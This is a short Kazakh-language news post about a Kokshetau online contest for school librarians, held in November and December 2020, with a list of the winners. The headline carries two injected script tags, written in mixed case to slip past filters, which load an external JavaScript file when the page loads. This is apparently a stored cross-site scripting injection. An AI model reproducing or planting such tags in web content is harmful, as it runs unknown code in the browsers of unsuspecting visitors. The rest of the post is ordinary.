«Онлайн оқыту жағдайында мектеп кітапханашысы жұмысының заманауи түрлері» онлайн-конкурс<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.12.2020

Ағымдағы жылғы 16 қараша – 4 желтоқсан аралығында Көкшетау қаласының білім бөлімі қала мектептерінің кітапханашылары арасында «Онлайн оқыту жағдайында мектеп кітапханашысы жұмысының заманауи түрлері» онлайн-конкурсын өткізді.

Конкурстың мақсаты - талантты және шығармашыл қызметкерлерді анықтау, көтермелеу және қолдау, кітапханашылардың жұмыс тәжірибесін тарату, мектеп кітапханасы жұмысының жаңа әдістерін енгізу.

Онлайн-конкурс екі кезеңнен тұрды: I кезең конкурсқа қатысу үшін «Менің мамандығым – мектеп кітапханашысы» тақырыбына  эссе жазу; II кезең «Онлайн оқыту жағдайында мектеп кітапханашысы жұмысының заманауи түрлері» атты жұмыс тәжірибесінің шығармашылық тұсаукесерін қамтыды.

Конкурс  қорытындысы бойынша жеңімпаздар анықталды:

1 орын - Мусина Зада Бапаловна;

2 орын - Лореш Людмила Анатольевна;

3 орын – Сарбасова Маржан Каркеновна, Свидерская Наталья Станиславовна.

Жеңімпаздарды құттықтаймыз және алдағы уақытта шығармашылық табыстар тілейміз!

Просмотров: 1562


Пікір қосу



Деректерді қолтаңбаға қосу